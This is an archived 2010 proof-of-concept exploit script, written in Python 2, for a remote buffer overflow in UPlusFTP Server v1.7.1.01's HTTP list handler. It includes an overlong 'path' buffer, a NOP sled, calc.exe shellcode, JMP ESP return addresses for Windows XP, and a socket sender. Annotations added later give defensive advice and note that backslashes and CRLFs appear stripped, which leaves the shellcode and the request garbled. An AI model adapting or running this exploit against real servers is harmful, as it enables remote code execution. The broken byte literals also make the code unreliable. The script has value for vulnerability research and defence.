
uplusftp-overflow.txt

Posted on 28 July 2010

#!/usr/bin/python
# UPlusFTP Server v1.7.1.01 [ HTTP ] remote buffer-overflow proof of concept.
# Per the author's notes below the vendor shipped a fixed build (v1.7.1.02)
# two days after notification, so the defensive action is a version check.
# From the traffic side, the trigger is a GET to /list.html whose `path`
# query parameter is several kilobytes long and carries HTTP Basic
# credentials; request-length limits and logging on that handler will
# surface it.
#
# NOTE(review): the listing appears to have lost its backslashes in
# transcription — the "x90" / "xd9..." literals below are plain ASCII text as
# written here, not the byte values the comments describe.
import socket,sys,base64
print """ # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC Discovered by : Karn Ganeshen Author : Karn Ganeshen / corelanc0d3r KarnGaneshen [aT] gmail [d0t] com http://ipositivesecurity.blogspot.com Greetz out to: corelanc0d3r http://corelan.be:8800/index.php ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # """
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010

# Exactly four positional arguments are expected; anything else prints the
# usage line and exits with status 1.
if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
# HTTP Basic credential sent with the request: a valid account on the server
# appears to be a precondition for reaching the vulnerable handler.
auth = base64.b64encode(user+":"+pwd)

# Overlong value for the `path` parameter: filler first, then the author's
# payload and return-address material as annotated in the original comments.
buf="A"*1963
buf+="x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e"
"x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01"
"xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24"
"x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e"
"x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25"
"x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71"
"xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9"
"xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60"
"xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17"
"xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4"
"x27x0cxbcx7fx38")
buf+="x90"*15
# Return address is OS-build specific (no ASLR on the tested XP builds); the
# SP3 variant is left commented out by the author.
#[ XP SP2 ] -> "x78x16xF3x77"
#0x77F31678 JMP ESP
buf+="x78x16xF3x77"
#[ XP SP3 ] -> "x3Fx71x49x7E"
#0x7E49713F JMP ESP
#buf+="x3Fx71x49x7E"
buf+="x90"*30
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x66x05x7Ax03" #ADD AX,037A
buf+="x50xc3" #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
# Raw HTTP/1.1 request assembled by hand. NOTE(review): the CRLF line
# terminators also look stripped in this transcription — as written, the
# three header pieces are joined by single spaces.
head = "GET /list.html?path="+buf+" HTTP/1.1 "
head += "Host: "
head += "Authorization: Basic "+auth+" "
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + " ")
    print "[!] Payload sent..."
    s.close()
# Bare except: every failure (refused connection, reset, send error) collapses
# into one generic message, and the socket is not closed on that path.
except:
    print "[x] Error!"

 
